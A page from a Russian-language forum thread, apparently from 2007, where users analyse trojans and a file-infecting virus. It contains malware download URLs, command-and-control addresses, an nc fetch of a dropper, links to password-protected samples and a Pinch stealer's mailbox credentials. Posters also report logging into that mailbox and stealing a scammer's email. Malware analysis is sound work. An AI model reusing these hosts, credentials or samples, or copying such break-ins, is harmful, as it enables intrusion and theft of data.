Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых) |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >> |
Посл.ответ | Сообщение |
|
Создано: 13 октября 2006 23:15 · Поправил: Модератор · Личное сообщение · #1 |
|
Создано: 23 ноября 2007 18:15 · Личное сообщение · #2 |
|
Создано: 23 ноября 2007 18:45 · Личное сообщение · #3 |
|
Создано: 24 ноября 2007 03:17 · Личное сообщение · #4 |
|
Создано: 24 ноября 2007 16:11 · Личное сообщение · #5 Halt По логу анализа видно что создает, читает, запускает и куда обращается. Ну а чтобы получить файлы который он создал можно этим сервисом воспользоваться hxxp://www.cwsandbox.org/?page=submit В CAB версии отчета будет присутствовать дровина. Хотя в дровине ничего хорошего и нет. ----- Computer Security Laboratory |
|
Создано: 24 ноября 2007 20:28 · Личное сообщение · #6 |
|
Создано: 25 ноября 2007 14:22 · Личное сообщение · #7 Трой какой-то ... инжектится в svchost.exe и просит соединения с вот этим адресом: 77.91.228.180. Что конкретнее делает - не разобрался. Там какой-то крипт кажется .... если кто осилит - расскажите что делает поподробнее и откудава это узнали link: dump.ru/files/n/n43730414/ pass: trojan ----- все багрепорты - в личные сообщения |
|
Создано: 25 ноября 2007 15:16 · Поправил: SLV · Личное сообщение · #8 HandMill, качает троя с http://thenetworkcom.com/dw.php?code=00-0C-29-05-FB-5B&hash=D013EF6DC7 2704A6AED57B7A3B051176 http://thenetworkcom.com/dw.php?code=00-0C-29-05-FB-5B&hash=D013EF6DC72704A6AED57B7A3B051176 только видимо сайт в дауне этот... далее лезет на /77.91.228.182... какойто гавнолоадер... ----- Shalom ebanats! |
|
Создано: 25 ноября 2007 18:25 · Личное сообщение · #9 SLV Еще как работает! nc thenetworkcom.com 80 GET /dw.php HTTP/1.0 Host: thenetworkcom.com HTTP/1.1 302 Found Date: Sun, 25 Nov 2007 15:21:10 GMT Server: Apache X-Powered-By: PHP/4.4.7 Location: ./soft/install_cr.exe Connection: close Content-Type: text/html В итоге получаем файлик install_cr.exe размером 334955 байт. analysis.seclab.tuwien.ac.at/result.php?taskid=610ba00b1fe540a4815bac18ae3956a6 www.cwsandbox.org/?page=details&id=46249&password=ukvno ----- Computer Security Laboratory |
|
Создано: 25 ноября 2007 20:35 · Личное сообщение · #10 Вообщем сегодня нарвался на сайтег (мож баян, короче ПОХ) Вот сцылька на статью: xakepok.org/2007/09/14/reversim-vebmonejj-trojan-vmeste.html Может, кому и пригодиццо, чтобы сразу не стать частью ботнета© %))) из статьи: Заключение: эта стотья написана для того чтобы показать жалкую сущность кедал на вмз, и попутно на раскрытие темы реверсенга малвар (мановар) хэк! © А вот это интересно, тоже из статьи: только ненадо нам тупо слать пинчи и червяков сначало узнайте есть ли у нас свободное время на них %) Red Bar0n[tPORt] © еще там статья содержимое такое: В данной статье излагается нехитрый, но 100% работающий способ сокрытия зараженного файла от ЛЮБЫХ антивирусов на Virustotal.Com© (гы, ща толпа неудачнеков бу читать %))) ЗЫ: мну ее не читал, так что хз правдо это или нед… ищите на томже сайте P. S. Кто знает хде сейчас компилирует барончег(?!), огласите списки…© ----- ЗЫ: истЕна где-то рядом, Welcome@Google.com |
|
Создано: 25 ноября 2007 22:01 · Личное сообщение · #11 кто разбирался что этот gormet.dll делает ?? и что в конечном итоге получается из строк вида E123E124 ?? чет я нихрена не понял... сдается мне что это зашифрованные имена функций.... ставит якобы видеоплагин Software\Microsoft\VideoPlugin но вот нахрена оно потом я так и не догнал... хотя нашел строки типа HTTP GEt можно что -то скачать/запросить.. ддос атака чтоль? |
|
Создано: 25 ноября 2007 22:28 · Личное сообщение · #12 [оффтоп] хакерок гавносайт, сборище кедисов, и админ двуличная скотина. раз я увел мыло кедиса, а на мыле было до тучи ключей для вм кошельков. и регистрация на этот сайт. там это чмо (кедис) продавал под видом билдера вм троя простой трой который воровал ключи. я стукнул админу (ему 18 а по общению лет 10), рассказал все как есть. он не то что не удалил топ по и подделав логи сделал из меня клоуна и выложил на форум свой дебильный. просто антиреклама жаль что так и не вышло расшифровать хеш его пароля ----- Shalom ebanats! |
|
Создано: 27 ноября 2007 10:02 · Личное сообщение · #13 |
|
Создано: 27 ноября 2007 10:04 · Личное сообщение · #14 описание виря если нужно: Технические детали Файловый вирус, заражающий исполняемые файлы Windows. Является библиотекой Windows DLL, имеет размер 17 920 байт. Инсталляция После запуска вирус копирует свой исполняемый файл в системный каталог Windows: %System%\ole16.dll После чего изменяет значения следующих параметров ключей реестра на: [HKCR\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32] @ = "ole16.dll" ThreadingModel="both" [HKLM\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\In ProcServer32] @ = "ole16.dll" ThreadingModel="both" Деструктивная активность Вирус заражает файлы с расширением .exe на случайно выбранном разделе жесткого диска. Вирус не заражает файлы в папках, имена которых содержат следующие строки: program files documents and _restore music При заражении вирус упаковывает тело заражаемого файла в архив CAB, после чего копирует свое тело поверх тела заражаемого файла, а упакованное тело последнего дописывает в конец. Точка входа в вирус и его заголовок при этом корректируется таким образом, что зараженный файл становится приложением Windows (PE-EXE файл) и является запускаемым. При запуске зараженного файла тело вируса выделяется и корректируется в библиотеку DLL и в таком виде сохраняется во временную папку Windows с временным именем. После этого запускается процесс : rundll32 %Temp%\<временное имя DLL-файла>,a <путь и имя запущенного файла> После этого вирусный компонент удаляет свое тело из зараженного файла и распаковывает запакованное в CAB архив тело программы, тем самым полностью восстанавливает его в исходное состояние и запускает. Вирус извлекает во временную папку с временным именем библиотеку DLL (размер 7168 байт). Также просматривает все окна на рабочем столе пользователя и внедряет в процессы, которым принадлежат эти окна, извлеченную DLL. Извлеченная библиотека DLL будучи подгруженной к какому-либо процессу периодически делает скриншоты активного окна в системе, после чего шифрует их и публикует на сайте x***e.ru. Рекомендации по удалению 1. Удалить файл %System%\ole16.dll. 2. Изменить значения параметров ключей реестра на: [HKCR\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32] @="shell32.dll" ThreadingModel="Apartment" [HKLM\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\In ProcServer32] @="shell32.dll" ThreadingModel="Apartment" 3. Удалить все файлы из папки %Temp%. 4. Для удаления всех копий вируса с жесткого диска следует воспользоваться Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию). |
|
Создано: 27 ноября 2007 10:33 · Личное сообщение · #15 Kycok Caxapa Кидай вирус нам Мы хоть на скрины на сайте полюбуемся. А так методу заражения четко описали: При заражении вирус упаковывает тело заражаемого файла в архив CAB, после чего копирует свое тело поверх тела заражаемого файла, а упакованное тело последнего дописывает в конец. Точка входа в вирус и его заголовок при этом корректируется таким образом, что зараженный файл становится приложением Windows (PE-EXE файл) и является запускаемым. По описалову я думаю не составит труда самому набросать утиль для лечения. Если размер тела статичен, то ищем файлы по сигнатуре, отрезаем тело вируса и распаковываем стандартной утилитой expand.exe ----- Computer Security Laboratory |
|
Создано: 27 ноября 2007 11:42 · Личное сообщение · #16 |
|
Создано: 27 ноября 2007 17:17 · Личное сообщение · #17 |
|
Создано: 28 ноября 2007 00:31 · Личное сообщение · #18 [HEX] пишет: Кидай вирус нам Мы хоть на скрины на сайте полюбуемся. зараженный файл приаттачить что ли? можно в принципе,он портит в основном дистрибутивы и здоровые файлы (от 1.5 мб и выше) [HEX] пишет: По описалову я думаю не составит труда самому набросать утиль для лечения. Если размер тела статичен, то ищем файлы по сигнатуре, отрезаем тело вируса и распаковываем стандартной утилитой expand.exe Там не все так просто,даже NOD32 его не лечит... размера тела м.б. меняется, часть файлов после излечения вообще не запускается. Каспера не могу установить потому что ему надо видишь все остальные антивири удалить перед установкой |
|
Создано: 28 ноября 2007 08:21 · Личное сообщение · #19 Ходил вчера один кампег лечить... так там целый рассадник всякой дряни. Люди юзали долбаного осла (IE) да ещё без авера. прихватил на пямять один экземплярчег гавнопича. мoдифициpoвaнный Win32/PSW.LdPinch.NCB тpoян (так сказал мой нод) гляньте куда он шлёт всё. пароль: 1 7aab_27.11.2007_CRACKLAB.rU.tgz - 6.dat.rar ----- AutoIt |
|
Создано: 28 ноября 2007 11:03 · Личное сообщение · #20 |
|
Создано: 28 ноября 2007 11:12 · Личное сообщение · #21 |
|
Создано: 28 ноября 2007 11:25 · Поправил: HandMill · Личное сообщение · #22 OLEGator ASCII "smtp.xaker.ru" ASCII "AUTH LOGIN",CR,LF ASCII "bG9hZHpfMTNAeGFrZXIucnU=",CR,LF (base64 видемо, эквивалент "loadz_13@xaker.ru" это пасс ? Он по длинне не подходит) ASCII "dW5wYXNz",CR,LF (или это пасс ? Или это тоже шифр, который нада расшифровать?) ASCII "MAIL FROM: loadz_13@xaker.ru" ASCII "RCPT TO: loadz_13@xaker.ru" На мыле уже походу другой пасс - зайти не удалось (hxxp://www.nextmail.ru/) ----- все багрепорты - в личные сообщения |
|
Создано: 28 ноября 2007 11:48 · Личное сообщение · #23 |
|
Создано: 28 ноября 2007 19:19 · Личное сообщение · #24 |
|
Создано: 28 ноября 2007 23:28 · Личное сообщение · #25 |
|
Создано: 29 ноября 2007 01:17 · Поправил: Halt · Личное сообщение · #26 ну я фаерфоксом зашел... отчетов 100 штук.. я сам пинч не смотрел..но странный он какой то.. обычно мыло используют для пересылки дальше.. а тут сразу на этом мыле и отчеты.. ну в общем ты в курсе какие пинчи обычно.. )) PS я когда отчеты сливал я их на серваке похерил... случайно хотя ничего хорошего там нет ( |
|
Создано: 29 ноября 2007 02:24 · Личное сообщение · #27 |
|
Создано: 29 ноября 2007 10:07 · Личное сообщение · #28 |
|
Создано: 29 ноября 2007 12:37 · Личное сообщение · #29 |
|
Создано: 29 ноября 2007 13:08 · Личное сообщение · #30 |
|
Создано: 29 ноября 2007 14:30 · Личное сообщение · #31 |
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >> |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
Эта тема закрыта. Ответы больше не принимаются. |